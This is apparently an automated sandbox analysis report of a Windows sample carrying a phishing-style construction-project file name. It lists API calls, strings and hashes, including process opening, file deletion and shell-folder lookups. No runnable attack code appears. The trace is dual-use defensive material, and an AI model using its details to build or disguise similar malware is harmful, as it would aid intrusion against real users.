                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                          • String ID: 4$h
                                                                                                                          • API String ID: 4066021378-1856150674
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                          • String ID: %%0.%df
                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                          • String ID: A
                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                          APIs
                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                          • String ID: caption
                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                          APIs
                                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                          • String ID: \systemroot
                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                          • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                          • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy
                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                          • API String ID: 1284135714-318151290
                                                                                                                          • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                          • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                          • String ID: 0$6
                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                          • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                          • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 290601579-0
                                                                                                                          • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                          • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                          APIs
                                                                                                                          • memchr.MSVCRT ref: 00444EBF
                                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                          • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                          • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                          • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                          • memset.MSVCRT ref: 0044505E
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memchrmemset
                                                                                                                          • String ID: PD$PD
                                                                                                                          • API String ID: 1581201632-2312785699
                                                                                                                          • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                          • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                          APIs
                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                          • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                          • GetParent.USER32(?), ref: 00409FA5
                                                                                                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2163313125-0
                                                                                                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: free$wcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3592753638-3916222277
                                                                                                                          • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                          • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040A47B
                                                                                                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                          • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                          • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                          • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                          • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                          APIs
                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                          • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                          • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                          • String ID: ($d
                                                                                                                          APIs
                                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00407E44
                                                                                                                          • memset.MSVCRT ref: 00407E5B
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                          • wcscpy.MSVCRT ref: 00407F10
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                          • free.MSVCRT ref: 004185AC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2802642348-0
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                          • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                          • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                          • String ID: 3A
                                                                                                                          • API String ID: 3300951397-293699754
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                          • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                          • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                          • String ID: strings
                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
